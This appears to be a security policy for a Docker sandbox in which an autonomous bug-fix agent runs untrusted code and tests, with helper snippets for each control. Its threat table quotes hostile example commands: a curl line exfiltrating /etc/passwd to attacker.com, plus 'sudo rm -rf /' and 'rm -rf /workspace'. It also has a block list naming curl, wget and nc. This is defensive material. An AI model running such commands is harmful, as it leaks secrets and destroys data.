# Sandbox Security Policy

## Purpose

This document describes the security controls applied to the Docker-based code execution
sandbox used by the Autonomous Code Review & Bug-Fix Agent.

## Threat Model

The sandbox runs **untrusted LLM-generated code** and **arbitrary pytest test suites**
from public GitHub repositories. The risk categories are:

| Threat | Example | Control |
|--------|---------|---------|
| Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` |
| Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60s timeout |
| Host filesystem access | `open('/etc/passwd')` | `--read-only`, volume-limited |
| Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) |
| Malicious commands | `rm -rf /workspace` | Command whitelist |
| Persistent state | Writing outside `/workspace` | `--read-only` + limited tmpfs |

## Security Controls (7 Layers)

### 1. Network Isolation: `--network=none`

The container has **no network access** beyond its own loopback interface: no DNS, no HTTP,
no outbound TCP or UDP connections. This is the most important control. It prevents data
exfiltration and blunts supply-chain attacks from untrusted test dependencies, which can
no longer reach external hosts.
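A quick way to confirm this layer is to run a connection probe inside the sandbox. The sketch below is hypothetical. `has_outbound_network` is not part of the executor, and the default target `1.1.1.1:53` is simply an arbitrary public resolver. Under `--network=none` the probe should return `False` for any external host, while connections to the container's own loopback interface still succeed.

```python
import socket


def has_outbound_network(host: str = "1.1.1.1", port: int = 53, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to (host, port) can be opened.

    Hypothetical smoke test meant to run *inside* the sandbox. Under
    --network=none only loopback exists, so external targets should fail.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # "Network is unreachable", DNS errors (socket.gaierror) and timeouts
        # (socket.timeout) are all OSError subclasses.
        return False


if __name__ == "__main__":
    print("outbound network reachable:", has_outbound_network())
```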
### 2. Memory cgroup: `--memory=2g`

If the container's memory use exceeds 2 GiB, the kernel OOM killer terminates processes
inside it. This keeps memory exhaustion, including the memory consumed by a fork bomb,
from affecting the host.
### 3. CPU cgroup: `--cpus=2.0`

Caps the container at two CPUs' worth of CPU time. This prevents CPU saturation that would
degrade other running containers or the host system.
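The sketch below makes the two limits concrete by converting the flag values into the numbers Docker hands to the kernel. It makes three assumptions:

- Docker's 1024-based size suffixes.
- The default CFS period of 100,000 µs. Docker documents `--cpus=1.5` as equivalent to `--cpu-period=100000 --cpu-quota=150000`.
- Only the single-letter suffixes are handled.

The helper names are hypothetical.

```python
# Hypothetical helpers: translate the docker run limit flags above into the
# raw cgroup values Docker derives from them.

# Docker size suffixes are 1024-based; only single-letter suffixes handled here.
_UNITS = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3}


def memory_limit_bytes(flag_value: str) -> int:
    """Parse a --memory value such as "2g" into bytes."""
    value = flag_value.strip().lower()
    if value[-1] in _UNITS:
        return int(float(value[:-1]) * _UNITS[value[-1]])
    return int(value)  # a bare number is already in bytes


def cpu_quota_us(cpus: float, period_us: int = 100_000) -> int:
    """--cpus=N is shorthand for a CFS quota of N * period microseconds per period."""
    return int(cpus * period_us)


if __name__ == "__main__":
    print(memory_limit_bytes("2g"))  # 2147483648
    print(cpu_quota_us(2.0))         # 200000
```

With these values, `--cpus=2.0` allows 200 ms of CPU time per 100 ms period, spread across any cores. It does not reserve two specific cores.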
### 4. Read-Only Filesystem: `--read-only --tmpfs=/tmp:size=256m`

The container's root filesystem is mounted read-only. There are only two writable locations:

- `/workspace`: the cloned repo (bind-mounted, scoped to this run)
- `/tmp`: tmpfs, 256 MB, wiped when the container exits

### 5. Command Whitelist: `ALLOWED_COMMANDS`

Before any command reaches Docker, the executor checks the base command name
against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo,
find, grep, head, tail, mkdir, cp, mv, touch, chmod}`.
Commands like `rm`, `curl`, `wget`, `bash`, `sh`, and `nc` are blocked at this layer.
Allowed tools such as `python` can still execute arbitrary code. This layer is therefore
defense in depth rather than a hard boundary, and the other layers must hold on their own.
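The allowlist check can be sketched as follows. `is_command_allowed` is a hypothetical name. The sketch assumes the executor tokenizes the command with `shlex` and passes the resulting argv to Docker directly rather than through `sh -c`. A shell would interpret operators such as `&&` and let a second, unchecked command run.

```python
import os
import shlex

# Mirrors the allowlist listed above.
ALLOWED_COMMANDS = frozenset({
    "git", "pytest", "python", "python3", "pip", "pip3", "cat", "ls", "echo",
    "find", "grep", "head", "tail", "mkdir", "cp", "mv", "touch", "chmod",
})


def is_command_allowed(command: str) -> bool:
    """Return True if the command's base name is on the allowlist (hypothetical helper)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        # Unbalanced quotes: reject rather than guess how a shell would parse it.
        return False
    if not tokens:
        return False
    # Compare the basename so "/usr/bin/curl" is treated the same as "curl".
    return os.path.basename(tokens[0]) in ALLOWED_COMMANDS
```

Comparing `os.path.basename(tokens[0])` means an absolute path such as `/usr/bin/curl` cannot sidestep the check.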
### 6. Non-Root User: `uid=1000`

All processes run as `agent:agent` (uid/gid `1000:1000`). If an exploit gets past the
command whitelist, it still cannot modify root-owned system files. Escalating to root would
require a separate vulnerability, for example in the kernel.
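Taken together, the container-level controls (layers 1-4 and 6) map onto `docker run` flags roughly as shown below. This is a sketch, not the executor's actual code. Several details are assumptions:

- The function name and the image name.
- The use of `--name` and `-w`.
- That the image does not wrap commands in a shell `ENTRYPOINT`.

`--rm` comes from the per-run isolation described later in this document.

```python
from pathlib import Path


def build_docker_run_argv(image: str, workspace: Path, command: list[str], name: str) -> list[str]:
    """Assemble a docker run invocation applying the container-level controls (hypothetical)."""
    return [
        "docker", "run",
        "--rm",                              # container deleted after the run
        "--name", name,                      # lets the executor stop it by name later
        "--network=none",                    # layer 1: no network beyond loopback
        "--memory=2g",                       # layer 2: memory cgroup
        "--cpus=2.0",                        # layer 3: CPU cgroup
        "--read-only",                       # layer 4: read-only root filesystem...
        "--tmpfs=/tmp:size=256m",            # ...plus a 256 MB tmpfs at /tmp
        "--user=1000:1000",                  # layer 6: non-root agent user
        "-v", f"{workspace.resolve()}:/workspace",  # the only writable bind mount
        "-w", "/workspace",
        image,
        *command,                            # argv list, no shell in between
    ]
```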
### 7. Timeout: 60 Seconds, SIGKILL

The executor enforces a 60-second hard timeout. On expiry, the container is stopped with
`docker stop --time=0`, which skips the grace period so that SIGKILL follows immediately.
This prevents hung processes from consuming resources indefinitely.
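A hard timeout has one subtlety. When `subprocess.run` times out, it kills the local `docker run` client, but the container itself keeps running. The hypothetical sketch below therefore calls an explicit cleanup hook on timeout. Here the hook is `docker stop -t 0` (`-t` being the short form of `--time`) against a named container. The names `run_with_hard_timeout`, `RunResult`, and `docker_stop_now` are illustrative.

```python
import subprocess
import sys
import time
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class RunResult:
    returncode: Optional[int]  # None when the run was killed on timeout
    elapsed_seconds: float
    timed_out: bool


def run_with_hard_timeout(argv: list[str], timeout: float,
                          on_timeout: Callable[[], None]) -> RunResult:
    """Run argv, enforcing a wall-clock limit and calling on_timeout if it fires."""
    start = time.monotonic()
    try:
        proc = subprocess.run(argv, capture_output=True, timeout=timeout)
        return RunResult(proc.returncode, time.monotonic() - start, False)
    except subprocess.TimeoutExpired:
        # subprocess.run has already killed the local child (the `docker run`
        # client), but that does not stop the container, so clean up explicitly.
        on_timeout()
        return RunResult(None, time.monotonic() - start, True)


def docker_stop_now(name: str) -> Callable[[], None]:
    """Build a cleanup hook that stops the named container with no grace period."""
    def _stop() -> None:
        # -t 0: SIGKILL follows the stop signal immediately.
        subprocess.run(["docker", "stop", "-t", "0", name],
                       capture_output=True, check=False)
    return _stop


if __name__ == "__main__":
    # Local demo without Docker: a 5 s sleep under a 1 s limit.
    result = run_with_hard_timeout(
        [sys.executable, "-c", "import time; time.sleep(5)"],
        timeout=1.0,
        on_timeout=lambda: print("cleanup hook called"),
    )
    print(result.timed_out, round(result.elapsed_seconds, 1))
```

In the sandbox, the call would look like `run_with_hard_timeout(docker_argv, 60, docker_stop_now(name))`, where `name` is the same container name passed to `docker run --name`.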
## Isolation Per Run

Each SWE-bench instance gets a **fresh temporary directory** as its workspace.
The container is created with `--rm`, so it is automatically deleted after each run.
No state persists between runs.

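The per-run workspace lifecycle can be sketched as a context manager, shown below. `fresh_workspace` is a hypothetical helper that copies the repo into a new temporary directory and yields it together with a unique container name. The directory is deleted on exit. The sketch assumes instance IDs are safe for both file paths and Docker container names, as SWE-bench IDs of the form `owner__repo-1234` are.

```python
import shutil
import tempfile
import uuid
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator


@contextmanager
def fresh_workspace(repo_src: Path, instance_id: str) -> Iterator[tuple[Path, str]]:
    """Yield (workspace, container_name) for a single run, then delete the workspace."""
    tmp = Path(tempfile.mkdtemp(prefix=f"sandbox-{instance_id}-"))
    workspace = tmp / "workspace"
    try:
        shutil.copytree(repo_src, workspace)
        # A unique name per run lets a timed-out container be targeted precisely.
        container_name = f"sandbox-{instance_id}-{uuid.uuid4().hex[:8]}"
        yield workspace, container_name
    finally:
        # Nothing written during the run survives into the next one.
        shutil.rmtree(tmp, ignore_errors=True)
```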
## Audit Log

Every command executed in the sandbox is logged with:

- `instance_id`
- `command` (truncated to the first 3 tokens for brevity)
- `returncode`
- `elapsed_seconds`
- `timed_out` flag

Logs are emitted via `structlog` (JSON format in production) and ingested by
the Prometheus/Grafana observability stack in Phase 8.
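A record with the fields listed above might be built as follows. `audit_record` is a hypothetical helper. It takes the already-tokenized argv, so truncating to the first three tokens needs no re-parsing. It serializes with the standard-library `json` module to stay self-contained.

```python
import json
from typing import Optional


def audit_record(instance_id: str, argv: list[str], returncode: Optional[int],
                 elapsed_seconds: float, timed_out: bool) -> dict:
    """Build one audit-log entry (hypothetical helper)."""
    return {
        "instance_id": instance_id,
        # Only the first 3 tokens are kept, as described above.
        "command": " ".join(argv[:3]),
        "returncode": returncode,  # None if the run was killed on timeout
        "elapsed_seconds": round(elapsed_seconds, 3),
        "timed_out": timed_out,
    }


if __name__ == "__main__":
    rec = audit_record("example__example-1",
                       ["python", "-m", "pytest", "tests/", "-x"], 1, 2.34567, False)
    print(json.dumps(rec))
```

In a structlog setup, the same dict could instead be passed as keyword arguments, for example `structlog.get_logger().info("sandbox_command", **record)`. The event name there is an assumption.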
## Known Limitations

- **Conda environments**: Some SWE-bench repos require specific conda environments
  with C extensions. The current sandbox installs dependencies with pip only, which may
  cause test failures for repos with complex native dependencies.
- **Docker-in-Docker**: The sandbox does not support running Docker inside Docker.
  Repos whose tests spawn subprocesses that call Docker will fail, because no Docker
  daemon is reachable from inside the container.
- **Flaky tests**: ~8% of SWE-bench issues have non-deterministic tests. These may
  burn retries even when the patch is correct; such cases are flagged with the
  `flaky_test` category.
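This document does not say how the `flaky_test` flag is assigned. One common heuristic, sketched here purely as an assumption, is to rerun a failing test a few times on unchanged code and treat any pass as evidence of non-determinism. `classify_failure`, `run_test`, and the `deterministic_failure` label are hypothetical.

```python
from typing import Callable


def classify_failure(run_test: Callable[[], bool], reruns: int = 3) -> str:
    """Classify a test that has already failed once against the candidate patch.

    run_test re-executes the same test on the same code and returns True on pass.
    """
    for _ in range(reruns):
        if run_test():
            # Same code, different outcome: the test itself is non-deterministic.
            return "flaky_test"
    return "deterministic_failure"
```

A pass on rerun does not prove the patch is correct. It only shows that this test's failure signal is unreliable, which is exactly the situation in which retries could otherwise be burned on a correct patch.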